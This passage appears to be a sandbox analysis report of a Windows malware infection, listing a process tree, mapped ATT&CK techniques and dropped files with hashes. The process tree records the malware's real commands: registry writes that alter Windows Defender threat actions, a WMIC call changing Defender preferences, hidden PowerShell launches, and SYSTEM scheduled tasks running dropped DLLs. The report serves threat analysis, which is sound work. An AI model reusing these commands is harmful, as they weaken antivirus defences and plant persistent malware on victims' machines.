  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:3428
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5980
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:2280
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4288
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5672
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:6080
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4332
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3168
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:2328
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5184
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4604
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:4588
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2800
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5276
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5284
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5268
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5580
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5520
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:5652
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:5656
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:8
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5976
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:208
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5824
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\cDkNDc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5072
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2412
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\dsevDyu.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6100
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:2020
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:5112
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\fmjOOsG.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2988
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\TjqBDPS.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5388
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1724
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\VTfApMu.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5972
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\iNuSjUK.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5048
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5352
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:5900

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\rmqaTvuh\fXMbYfx.dll",#1 /HMJdidu 385118
1⤵
PID:3344
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\rmqaTvuh\fXMbYfx.dll",#1 /HMJdidu 385118
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Drops file in System32 directory
  - Enumerates system info in registry
  PID:4252
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
    3⤵
    PID:2604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
6010562d514665cc94b339e44a0282ad

SHA1
af5585f91433eb368795ae81e0940cc7c38fe547

SHA256
da9e25128fc3eae9a4a22d71cacf36a74859af967a1f49e1aec566708a57d1df

SHA512
8b5ed862cb3fcab92992cc493c6cdf17fd1b24c722f64d18122b5f62e67ca9f0a38203cdecf5260ed31e4a0ad587b027a2251dba94f7b283e4da7a3cc3471078

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\_locales\en\messages.json

Filesize
217B

MD5
dd564797aa2c90110ef784017dbcdbdc

SHA1
bd92462c3bd79dedafad76f8b24e6261e73ef04b

SHA256
1b63c3fdedf926ca9f3e4b6a331ef3c6cead5f8005191f6529a9745865f51aba

SHA512
d537fdcfcf4b4c0563a0f22848de0f9a7cdd4870e8002abd77bc8bba2bdd44430a64403dbea1fbb2bd8a15ef60068e2c1e223e205b7ae25c19b2aac0a01013ab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\_metadata\verified_contents.json

Filesize
1KB

MD5
c6f27d4c5b78b049b2fc34188c880e15

SHA1
9041a52dc774e599978da6042bf5960e58efacf4

SHA256
bdff761080d89d671ebe4ec28b1b82ff2229fd6bc25d06d3504c75697fe5d3c0

SHA512
f3d6c2f3671e7771e1566036d65f6839bd53ec78de82c59efb1190e6fecb81be0dbac74a03b22a1fdba2abf7cf2d03808ea77d6a4a999d9f6da8e5ffc4233f66

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\icons\icon-128.png

Filesize
14KB

MD5
8af1aef5361d4f67ee2496d2ee4d5f81

SHA1
2c85dd1d953c999dcb694aa59f47385254169806

SHA256
fad56011910b792dc6e057f9e7dfb89e4342aeeaf260e098f67008b68a3bd04f

SHA512
05f6ad93d95f96b66a78be5fe722d3baf938f90a2d123eae72ddcaf790235630f7aec495ddd3e42d9aee0ccdda0c724520d5db1007fc5aad1302ae3fc9452003

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\icons\icon-16.png

Filesize
654B

MD5
116154520a5241b455f08fd7bc29e99d

SHA1
4c7155fc19637b5bb919100a8123cebc202a3b87

SHA256
a5571a0623564757d45d625ca56b07bec2e32e19b058b9f43e93fbe4e2c2d589

SHA512
2f5acadf261c7cce1e1b71ee6b8cccbd5a19009a90a06c37f9335c819a06988c78c4efef3a3bc196de67ece4e18dcfa508a6fc4a0016822be40f45f4b456a9c2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\icons\icon-32.png

Filesize
1KB

MD5
bb05c2b0dd4612d0ab94e353c80f18e4

SHA1
7f1a14339b08c6140a4e5543479382adfb0d09d8

SHA256
5ec71ad6b7058183a4a1e46ef570213e9450e3173bb7809365a0c66bf7e2b61b

SHA512
f143cf26e308679bda02abd1a5ec9330be6d33cd7b2317e6ae695bdf7ba88da5d25d54e772777c27302ddae60532017d493d823c8c209cda44917ee7b482b5d3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\icons\icon-64.png

Filesize
4KB

MD5
b4d4e7bad349bf3cc49cf75d41df7e58

SHA1
66a6f348a1e1bbf963208b08a5285ab231e1ed1f

SHA256
4fe78885932758161092d3c1d22843cdfcbfa92a546d155ce2887a176d1fa319

SHA512
f1a8c206501cfdc0644dc5975ac202e99c8dc1643180374297e1d9c9b9358e256fbeaca5bc77b142e70db3bb03f3ad8d674bfe6820e26cb76de177f9e9c21fd0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\2.0.0.3_0\1.0.0.0\manifest.json

Filesize
1KB

MD5
b7cdcfb73e8696887df4adbb2dfb0a71

SHA1
4887cdb7ce54d8db677e7a0e118fad92b6b9710c

SHA256
3ff8b96d52762ab4b9799c0195f4dccb80216f5b03a54999c1d343fc63e8ea15

SHA512
1eb151ba80d23b37e2043c5100375957b75c13a337d051018766f88653d39bf779b5cf6fa8b49546c1b1d5dce4c3f2558348f5f63fe9009f719088a7338c96a0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
ae8f7ed201d77f1443bfdb7e6bda4b89

SHA1
8d0a160092ecedd6e040e09632935fa4e31c5b46

SHA256
82d00f8530d9cb1f352bb9bac651d682620c0efd5b9696a9e339c936a5bda138

SHA512
0b5a9462b80b73e0e7f64092a0b92be715e1d54d2df94b3b5ce4a94f8fb313f6458eadbe9d63707ffec198052e0c7adacf29fc47395e2991d9eb444d650d4baa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
17ef2e799b15fce82f4b99b7b2dd0966

SHA1
34f43d9b384c34de11f1e15e2fbcf89a9e2f033f

SHA256
b82aa1a4af8a432521984e30ff6f3bdb89446fcc773eae2771a246f7cd77739a

SHA512
9847974a9e24a6a41c501d4c0cb787d40b502c71daf3507e2c7c2ef92ee8b4ddea943ed7a1a273cfb808f9b7a4ba32026d1b18a14d597e65905d6dc21691e01b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
31KB

MD5
91fda7648e685dd3e4fb44bf0ae2ca8e

SHA1
3fa0c6adcaf9e12ac3f4136f0ae6aed06e7acd8b

SHA256
8b60d2a7464a7ea55207d1883aa636bbe94ecabff5e9e4015265d1a1b5b68060

SHA512
dba8f0a051dafab2f8c4aefa87072b7379496d20d8fbd9fc5a531db5d1a888dd6f58ec099ceac832d14d59432567146db4012fb1c25added9132f8435ce0ea34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
31KB

MD5
60fcb78da1a82df9b8fb0808ab55cdb4

SHA1
42c6c469502ab31f0535d0a060fd80438d37e214

SHA256
415d31c77ec71c45669a2caf63ec8c743f05609a13c19829d77fde512934f7bd

SHA512
30fb0ab2e80c54b387c41f6dcff722b08d46cc1de57f66221f473f09e0ad8824215b72b41ddef9f82d41af63edbabe8fc1b198d76da95b5d3853b81703866417

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
cb6ed3a4f70ae77299d5f32cb1e40d52

SHA1
51a6cf33fb23dad6a6de7f175b8bca1120908360

SHA256
3b3ec315a80a596853d55b6892cab773b711b86c8d22139f402d44ce247a55de

SHA512
0a3ba57e48cad25f50a9d9e489848235b687a575efdc3067d92d99c9b1734da9f828a80066595fb8d00399b35ca9f43f892ebe4798925e913286b7a775ccac85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
19885042685c484110d854b7bda59b31

SHA1
f3c54f4ac356cfe5a3a31dc8319e92aa2f531095

SHA256
3f4299f1309fc4314bdbaa79e27b655a6fc38e950501a64bf44b289fe75775c2

SHA512
8164577b45d01ac70eb5bcbaec74f9b85132b47d631116cd11e92168e191116397024b7bf7dac84b27c4ba517ffa6f8dd3dae2adae9bd8c532149d7613749926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
70adb2cee9835dcd888eaae7580203ae

SHA1
20105bc45013ad0af327f1bc62a8f49426f2fa04

SHA256
85380dcd5378a86dfa18fc137e159a2779ba9d1174647b36455aa4fe7e50fe9c

SHA512
5cce8aab9c8d48d27562433a7c0faeb02fee68ec05e70c47a783d0f4a4cbadb5c20187ef8b9b3dc1f5204d5d0c4b9736b0f48947767e29b990be12d4aeee6cc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71b43dc0dd5e50804fbdf06e07266a48

SHA1
7e59d6e69fec437d6bfb38b2083fb85632937342

SHA256
369490e2a09fc421b20d7449fedc81146a3237e667e989799cca7c8d717701cd

SHA512
d22bbb91f7973189dbde647f4b605c3d880256ba1759aaefce69ff6164ced15aceac0037058ebd5029a4c33bc351365fb88eef3ee143d931e2c22bbce974e653

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
e27dd889403d35b81a864bd9545dd8e5

SHA1
6e4ea59f4a6d0063a364a86f1afc5ea0eeffefb6

SHA256
3e6d8c4d82503aa37c38d6f48be1b24dfe46ab4de0a23f0faeb563bb6368dd6c

SHA512
c35a3fb837ae815aa934b31389dc91d145ba198bf1c0f561070b3b873ce737522930fc5f842de0bbc6bb777b2b12e2c12a2bc5ec7c20d02c93278fc5bd202d77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
31ce782fe948d9794fea5cc59b98b4bd

SHA1
4fce0aaf9b9ab8c612027bd0dd9a27eca3c41bd1

SHA256
70bd7f4ca22c0301e8c217bc732c096db2bbdbe818ca03af556cd2d8b4cb52cd

SHA512
e38d90ed547ee1460a22b87aa368f86bfad25d4808d59ac0446fbfed036d29dec038d4377d92dbd28664485dabdb2f0fe8b8a3625baadbd11798b026e65c3cf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
ee5ac6d8eaf0003a0d743723a154120c

SHA1
abe623626f9cb596f2512f0cfe6740c543fc692c

SHA256
495f3ab00b141be9926efddbfd05d16fb9c2652b4e1b1baf8bfa6333439a3103

SHA512
fad263d6edbee68600a64c4e23374d23e0d95e357d069816b709a6a0f9e8d05bf4c8208a07adb5f572339e5aa5086f23950227cfb89ca417e0fe5ebc19eee9c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
c8d37099fd0a42c89d53d88b33f8a016

SHA1
0f3bdc28dca5fc4034e72897beb16e07d46ada8d

SHA256
474335ca14729a3e2a7c73ac43c4929157eea55537bc3a99dbc155b7b3e5f058

SHA512
a9c11f6b4568788669e425292fa8998bbbd7223c08aadfaf3e5c7eabe81b5e463392e62194fa8cc774b9498ca4d5b6e0d7d0022b1cda73340e50812933e4a932

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7ACD.tmp\Install.exe

Filesize
6.4MB

MD5
220a02a940078153b4063f42f206087b

SHA1
02fc647d857573a253a1ab796d162244eb179315

SHA256
7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

SHA512
42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSA18F.tmp\CastSrv.exe

Filesize
90KB

MD5
926a9def76ad857825c435eaabd4a686

SHA1
b96e9857cba9fbca67d6cb9449b2218df4488517

SHA256
77a1f38aa476f33cf8295028c24d846caa6445efd8cfca9ca85cb020085b64c3

SHA512
e53f6d5ea7fd748615f8619abb3c77f635e4f7ad52873db19449e25407300cbd660533f2b2396a759c899f2f56e45f0686c4fcd430b580979cbb3a04547dd83b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSA18F.tmp\Info.xml

Filesize
3KB

MD5
0456be6047774e5d0b8045b787048924

SHA1
76f6445368a4462a50e502bc272a8efc2eb33cb0

SHA256
1c4440a8312e16bc682277164cc6710b37fc3dcac5ef9aa0ba7e77fc0c1f4897

SHA512
c0f0cf97e0fd0b258b9a9fa6466dd9e390cd79f3edb0f5b9f10137c241c6b079061135c44c0c30dc71c28f1b7b929c65eb1112761e53cd8400d7e07ce1a7b99c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3vhmmyr.q32.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
2KB

MD5
cf4bbd02a201c30e20e80b3daa2527ea

SHA1
9a27ecd927a2dcbd24b0146c864e4d089f773ea7

SHA256
70b0e89af0922f8ff94d7c7a8e8573a90ac039b13b4902f12811fcd99f99f70d

SHA512
935ce6809937c56da869b5d2d1e142b1f33bbb11caffddd0acfee8a2e9572e33bcd437602fc21b5c1edb63cc2f85d49dc5d7b3703d4cadd5641e546d40d1e3b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
3KB

MD5
76ad1bf507249bc2fb30e4241da36bbc

SHA1
b7873c250c4fad4ceeeff646d62bd6eeb3a0ed77

SHA256
effa15134e23711f759c90632873d4d548162e959ebd3a5ca5ea1fda53bdbd77

SHA512
5620932da99573e258ba188385a09c404ba039cab2580db5ea5f8a78795bb57e04b7e2d96c3e15dbc252bc121bb19551bce30e8d0b5f86e9bbc6108148938e8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1uc.0.exe

Filesize
282KB

MD5
f72e01dfb65e6409cb0fc611e466e9d5

SHA1
e3d9f9d5e531ea1537bbecbf8064c5772a3c4a26

SHA256
7eec5c68ccc964cae08684c73b65a0427623454286b253b4ee4453dc1aa93bbf

SHA512
7f47b5e7d997d923ca3d2a481bd8754b01c444c3be284b01e8577e58632bf1b69db87927e57079999e9ffc4dc1d50c45b68a5ce3b4ad58bdcf55d48acb9a87c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1uc.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
C:\Users\Admin\AppData\Local\Vjf8xN1qG1lObe5db5Spzfkk.exe

Filesize
4.2MB

MD5
d42f70bc211153abcc56b7b550d8f066

SHA1
2e79143fa90a058e56dad12920f2d450cc138098

SHA256
f1ad483fb40354a1d2c9f1b8ed46ae799fc67433af0a6ff0393c59939f752d4f

SHA512
c10085de5476de153204a08c7e66245fa729922f118f6a2567ec547097effe710c31d0f626aedae4af1a971e3594fd7cf2544d353168f931ed4ab9dc99f12c79

Download Submit
